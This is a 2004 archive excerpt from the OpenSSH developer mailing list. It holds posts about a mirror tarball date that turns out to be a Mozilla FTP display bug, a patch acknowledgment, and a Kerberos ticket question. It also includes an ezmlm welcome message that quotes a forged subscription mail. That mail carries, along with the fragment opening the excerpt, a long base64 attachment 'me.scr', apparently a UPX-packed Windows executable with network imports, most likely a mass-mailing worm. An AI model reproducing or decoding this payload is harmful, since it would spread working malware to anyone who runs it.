AAAAAAAAAP8AAP///////////////////////////////////////////////wAAAP8AAP// /////////////8DAwMDAwMDAwMDAwICAgP///////8DAwICAgAAAAAAAAAAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP////////////////// /////////////4CAgP///8DAwICAgAAAAAAAAAAAAAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////////////////////4CA gMDAwICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /////////////////////////////////////////////////////4CAgICAgAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////4CAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA gICAgICAgICAgICAgICAgICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/////+AAAA/gAAAP4AAAD+AAAA/gAAAP4A AAD+AAAA/gAAAP4AAAD+AAAA/gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAAADAAAABwAAAA/+AAAf/gAAP/4AAH//////SH0BAAAA AQABACAgAAABABgAqAwAAAEAAAAAAAAAAAAAAAAAKK4BAPCtAQAAAAAAAAAAAAAAAAA1rgEA AK4BAAAAAAAAAAAAAAAAAEKuAQAIrgEAAAAAAAAAAAAAAAAAT64BABCuAQAAAAAAAAAAAAAA AABargEAGK4BAAAAAAAAAAAAAAAAAGauAQAgrgEAAAAAAAAAAAAAAAAAAAAAAAAAAABwrgEA fq4BAI6uAQAAAAAAnK4BAAAAAACqrgEAAAAAALyuAQAAAAAAyK4BAAAAAAADAACAAAAAAEtF Uk5FTDMyLkRMTABBRFZBUEkzMi5kbGwAaXBobHBhcGkuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFBy b2Nlc3MAAABSZWdDbG9zZUtleQAAAEdldE5ldHdvcmtQYXJhbXMAAHdzcHJpbnRmQQAAAElu dGVybmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= --34222687-- From jimpop at yahoo.com Thu Mar 4 12:55:53 2004 From: jimpop at yahoo.com (Jim Popovitch) Date: Wed, 03 Mar 2004 20:55:53 -0500 Subject: v3.8p1 from 02/24/2003 Message-ID: <1078365353.11414.26.camel@bluetoo> The www.openssh.org website shows v3.8p1 as being released on February 24, 2004, however some (might be all) mirrors show a tarball date of 02/24/2003 02:54:00 AM. This may or may not be of concern, but I thought it of enough interest to pass along. I'm not sure if anyone else should know about this, but I figured that you folks would. Thanks, -Jim P. From dtucker at zip.com.au Thu Mar 4 13:37:50 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Thu, 04 Mar 2004 13:37:50 +1100 Subject: v3.8p1 from 02/24/2003 In-Reply-To: <1078365353.11414.26.camel@bluetoo> References: <1078365353.11414.26.camel@bluetoo> Message-ID: <4046967E.9080306@zip.com.au> Jim Popovitch wrote: > The www.openssh.org website shows v3.8p1 as being released on February > 24, 2004, however some (might be all) mirrors show a tarball date of > 02/24/2003 02:54:00 AM. I picked one (ftp://ftp.it.net.au/mirrors/OpenBSD/OpenSSH/portable/) and looked via ncftp: -r--r--r-- 1 ftpadm staff 826588 Feb 23 19:54 openssh-3.8p1.tar.gz -r--r--r-- 1 ftpadm staff 187 Feb 23 19:54 openssh-3.8p1.tar.gz.sig Ditto with vanilla ftp. Also looks OK in Lynx (via a squid proxy): [FILE] openssh-3.8p1.tar.gz . . . . . . Feb 23 19:54 808k [FILE] openssh-3.8p1.tar.gz.sig . . . . Feb 23 19:54 1k However, the same server viewed via Mozilla (via FTP, no proxies) is wrong: openssh-3.8p1.tar.gz 808 KB 23/02/2003 7:54:00 PM openssh-3.8p1.tar.gz.sig 1 KB 23/02/2003 7:54:00 PM but via HTTP (http://ftp.it.net.au/OpenBSD/OpenSSH/portable/) is OK: openssh-3.8p1.tar.gz 24-Feb-2004 03:54 807k openssh-3.8p1.tar.gz.sig 24-Feb-2004 03:54 1k The signature verifies and the md5sum matches. Maybe a date parsing bug in Mozilla's FTP? > This may or may not be of concern, but I thought it of enough interest > to pass along. I'm not sure if anyone else should know about this, but > I figured that you folks would. As always, users are encouraged to verify the GPG signature and/or check the md5sums against the release notes (from one of the mail list archives, or http://www.openssh.com/txt/release-3.8). -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From jimpop at yahoo.com Thu Mar 4 14:02:47 2004 From: jimpop at yahoo.com (Jim Popovitch) Date: Wed, 03 Mar 2004 22:02:47 -0500 Subject: v3.8p1 from 02/24/2003 In-Reply-To: <4046967E.9080306@zip.com.au> References: <1078365353.11414.26.camel@bluetoo> <4046967E.9080306@zip.com.au> Message-ID: <1078369367.11414.51.camel@bluetoo> Thank you for the details Darren. To confirm, I am running Mozilla Firefox, and it would appear that this is a bug in the mozilla ftp client. Thanks, -Jim P. On Wed, 2004-03-03 at 21:37, Darren Tucker wrote: > Jim Popovitch wrote: > > The www.openssh.org website shows v3.8p1 as being released on February > > 24, 2004, however some (might be all) mirrors show a tarball date of > > 02/24/2003 02:54:00 AM. > > I picked one (ftp://ftp.it.net.au/mirrors/OpenBSD/OpenSSH/portable/) and > looked via ncftp: > -r--r--r-- 1 ftpadm staff 826588 Feb 23 19:54 openssh-3.8p1.tar.gz > -r--r--r-- 1 ftpadm staff 187 Feb 23 19:54 openssh-3.8p1.tar.gz.sig > > Ditto with vanilla ftp. Also looks OK in Lynx (via a squid proxy): > [FILE] openssh-3.8p1.tar.gz . . . . . . Feb 23 19:54 808k > [FILE] openssh-3.8p1.tar.gz.sig . . . . Feb 23 19:54 1k > > However, the same server viewed via Mozilla (via FTP, no proxies) is wrong: > openssh-3.8p1.tar.gz 808 KB 23/02/2003 7:54:00 PM > openssh-3.8p1.tar.gz.sig 1 KB 23/02/2003 7:54:00 PM > but via HTTP (http://ftp.it.net.au/OpenBSD/OpenSSH/portable/) is OK: > openssh-3.8p1.tar.gz 24-Feb-2004 03:54 807k > openssh-3.8p1.tar.gz.sig 24-Feb-2004 03:54 1k > > The signature verifies and the md5sum matches. Maybe a date parsing bug > in Mozilla's FTP? > > > This may or may not be of concern, but I thought it of enough interest > > to pass along. I'm not sure if anyone else should know about this, but > > I figured that you folks would. > > As always, users are encouraged to verify the GPG signature and/or check > the md5sums against the release notes (from one of the mail list > archives, or http://www.openssh.com/txt/release-3.8). From dtucker at zip.com.au Thu Mar 4 20:15:00 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Thu, 04 Mar 2004 20:15:00 +1100 Subject: Minor Thread Bug In OpenSSH 3.8p1 In-Reply-To: <20040227202033.GA7078@reddwarf.ucs.ualberta.ca> References: <20040227202033.GA7078@reddwarf.ucs.ualberta.ca> Message-ID: <4046F394.9090904@zip.com.au> Antoine Verheijen wrote: > I have chosen to comment out the guts of routine import_environments() if > USE_POSIX_PTHREADS is not defined as a solution, reasoning that this will > also work if that routine a called by other parts of the code in some later > version. Patch applied, thanks. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From kumaresh_ind at gmx.net Thu Mar 4 21:41:19 2004 From: kumaresh_ind at gmx.net (Kumaresh) Date: Thu, 4 Mar 2004 16:11:19 +0530 Subject: SSH + Kerberos Password auth Message-ID: <084f01c401d5$4af2e270$230110ac@kurco> Hello, I have a question about SSH with Kerberos password authentication . Do I receive any host ticket to my client machine when I do ssh connection with Kerberos password authenticaiton? If dont, why? If I login to remote machine through telnet with Kerberos Password authentication [through PAM-kerberos], then I can see the tickets with klist. But with the same setup for sshd, I cannot see the tickets with klist. Thanks, Kumaresh --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 From arise-help at pry.com Thu Mar 4 22:43:34 2004 From: arise-help at pry.com (arise-help at pry.com) Date: Thu, 04 Mar 2004 11:43:34 -0000 Subject: WELCOME to arise@pry.com Message-ID: <1078399336.28439.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. Acknowledgment: I have added the address openssh-unix-dev at mindrot.org to the arise mailing list. Welcome to arise at pry.com! Please save this message so that you know the address you are subscribed under, in case you later want to unsubscribe or change your subscription address. To unsubscribe, send a message to: --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 28435 invoked by alias); 4 Mar 2004 11:22:16 -0000 Delivered-To: arise-sc.1078356863.bdobopfgcnngnbelejpn-openssh-unix-dev=mindrot.org at pry.com Received: (qmail 28431 invoked from network); 4 Mar 2004 11:22:15 -0000 Received: from unknown (HELO i2kc02-ukbr.domain1.systemhost.net) (217.32.164.150) by 0 with SMTP; 4 Mar 2004 11:22:15 -0000 Received: from i2km95-ukbr.domain1.systemhost.net ([193.113.197.29]) by i2kc02-ukbr.domain1.systemhost.net with Microsoft SMTPSVC(5.0.2195.6713); Thu, 4 Mar 2004 11:24:16 +0000 Received: from i2km02-ukbr.domain1.systemhost.net ([193.113.197.79]) by i2km95-ukbr.domain1.systemhost.net with Microsoft SMTPSVC(5.0.2195.6713); Thu, 4 Mar 2004 11:24:16 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: confirm subscribe to arise at pry.com Date: Thu, 4 Mar 2004 11:24:16 -0000 Message-ID: <3D67CCA7D63E714B980D21A038EEA08E098865E1 at i2km02-ukbr.domain1.systemhost.net> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: confirm subscribe to arise at pry.com Thread-Index: AcQBe2h/LOHJPeL3TpmnFZC6AeNarwAX714Q From: To: Return-Path: alex.bell at bt.com X-OriginalArrivalTime: 04 Mar 2004 11:24:16.0423 (UTC) FILETIME=[3A813B70:01C401DB] Alex Bell BT Global Solutions SSC Integration & Implementation (I&I)=20 Telephone: +44 1923 668461 Mobile: +44 7817 711827 e-mail: alex.bell at bt.com=20 =20 Web: http://www.bt.com -----Original Message----- From: openssh-unix-dev-bounces+alex.bell=3Dbt.com at mindrot.org [mailto:openssh-unix-dev-bounces+alex.bell=3Dbt.com at mindrot.org] On = Behalf Of arise-help at pry.com Sent: 03 March 2004 23:34 To: openssh-unix-dev at mindrot.org Subject: confirm subscribe to arise at pry.com Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. To confirm that you would like openssh-unix-dev at mindrot.org added to the arise mailing list, please send an empty reply to this address: =20 arise-sc.1078356863.bdobopfgcnngnbelejpn-openssh-unix-dev=3Dmindrot.org at p= r y.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. This confirmation serves two purposes. First, it verifies that I am able to get mail through to you. Second, it protects you in case someone forges a subscription request in your name. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 14331 invoked by alias); 3 Mar 2004 23:34:23 -0000 Delivered-To: arise-subscribe at pry.com Received: (qmail 14327 invoked from network); 3 Mar 2004 23:34:18 -0000 Received: from unknown (HELO pry.com) (213.13.229.68) by 0 with SMTP; 3 Mar 2004 23:34:18 -0000 From: openssh-unix-dev at mindrot.org To: arise-subscribe at pry.com Subject: warning Date: Wed, 3 Mar 2004 20:36:47 -0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=3D"34222687" --34222687 Content-Type: text/plain; charset=3Dus-ascii Content-Transfer-Encoding: 7bit misc --34222687 Content-Type: application/octet-stream; name=3D"me.scr" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=3D"me.scr" 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 